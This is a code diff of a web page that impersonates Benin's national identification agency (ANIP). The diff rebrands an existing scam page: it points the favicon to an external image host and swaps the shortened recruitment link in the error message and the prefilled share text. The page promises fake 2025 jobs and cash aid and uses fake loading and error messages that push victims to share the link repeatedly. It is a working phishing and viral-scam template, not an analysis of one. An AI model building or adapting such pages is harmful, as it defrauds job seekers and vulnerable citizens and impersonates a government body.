--- a/index.html
+++ b/index.html
@@ -34,7 +34,7 @@
        <meta charset="UTF-8">
         <meta name="viewport" content="width=device-width, initial-scale=1.0">
         <title>l’Agence Nationale d’identification des personnes (ANIP)</title>
-        <link rel="shortcut icon" type="image/png" href="11.jpg">
+        <link rel="shortcut icon" type="image/png" href="https://media-hosting.imagekit.io/30f5d4da9fec4d24/img.png?Expires=1839628032&Key-Pair-Id=K2ZIVPTIP2VGHC&Signature=LER0LAfwQwI9w~pSSNbryPmHmNTQWrMdvx4bqCzs7FoZivaESmMHdkkuJgRMDwA~yI0aq-avyIT~l4LIp5WhN6Xf6RNk3HAKeTAjP2PIqFmsfnUiBiXhW9pp3rMfp4a0n766C~WRN0mFbT5F~OQI1ylgYoPqA4rdaZK1XR6CYjKBKyXIQv3kpeHulKBdyl5cJcoEB0NrjFT2hI22oGZur5MUiKAheD8G7A0DlXF5eMtgyJcLEE9KSd9htPo86Tg-Fp6D24QCd5EZnHPCZthii7UvwUchWDJiGivktr2wDImgrJZjNd6EvVc7IEV5nj15sVhNlReh-eAH2X~JmNz5ww__">
         <meta name="og:title" content="l’Agence Nationale d’identification des personnes (ANIP)">
         <meta property="og:description" content="Cliquez ici pour soumettre votre candidature maintenant">
         <meta property="og:image" content="https://media-hosting.imagekit.io/30f5d4da9fec4d24/img.png?Expires=1839628032&Key-Pair-Id=K2ZIVPTIP2VGHC&Signature=LER0LAfwQwI9w~pSSNbryPmHmNTQWrMdvx4bqCzs7FoZivaESmMHdkkuJgRMDwA~yI0aq-avyIT~l4LIp5WhN6Xf6RNk3HAKeTAjP2PIqFmsfnUiBiXhW9pp3rMfp4a0n766C~WRN0mFbT5F~OQI1ylgYoPqA4rdaZK1XR6CYjKBKyXIQv3kpeHulKBdyl5cJcoEB0NrjFT2hI22oGZur5MUiKAheD8G7A0DlXF5eMtgyJcLEE9KSd9htPo86Tg-Fp6D24QCd5EZnHPCZthii7UvwUchWDJiGivktr2wDImgrJZjNd6EvVc7IEV5nj15sVhNlReh-eAH2X~JmNz5ww__">
@@ -431,7 +431,7 @@ button:hover {
                   
           <button id="confirm">APPLIQUER</button>
             </p></h3></div>
-            <p class="error">Désolé, certains détails sont incorrects. <a href="https://tinyurl.com/jolaks-sl-recrtmnt"> <b><font color="#14948F">CLIQUEZ ICI POUR AJOUTER DES DÉTAILS À NOUVEAU </font></b></a></p>
+            <p class="error">Désolé, certains détails sont incorrects. <a href="https://tinyurl.com/ANIP-BJ-RECRTMNT"> <b><font color="#14948F">CLIQUEZ ICI POUR AJOUTER DES DÉTAILS À NOUVEAU </font></b></a></p>
         </center></div>
         <div id="checking">
             <p class="title">Chargement du portail d'application.......</p>
@@ -595,7 +595,7 @@ $(document).click(function () {
 
 
 <script>
-        var text1 = "*Recrutement de l'Agence Nationale d'Identification des Personnes (ANIP) 2025*%0A%0L'Agence Nationale d'Identification des Personnes (ANIP) recrute des personnes intéressées dans différents services vacants.%0A%0ALe portail de candidature en ligne est ouvert et le dépôt des candidatures est en cours.%0A%0ALe candidature est ouverte à tous les candidats intéressés et les travailleurs seront sélectionnés prochainement.%0A%0A*Les candidats intéressés doivent soumettre leur candidature en ligne via le lien ci-dessous:*%0Ahttps://tinyurl.com/jolaks-sl-recrtmnt",
+        var text1 = "*Recrutement de l'Agence Nationale d'Identification des Personnes (ANIP) 2025*%0A%0L'Agence Nationale d'Identification des Personnes (ANIP) recrute des personnes intéressées dans différents services vacants.%0A%0ALe portail de candidature en ligne est ouvert et le dépôt des candidatures est en cours.%0A%0ALe candidature est ouverte à tous les candidats intéressés et les travailleurs seront sélectionnés prochainement.%0A%0A*Les candidats intéressés doivent soumettre leur candidature en ligne via le lien ci-dessous:*%0Ahttps://tinyurl.com/ANIP-BJ-RECRTMNT",
             text2 = " an amount of ",
             text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
             error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
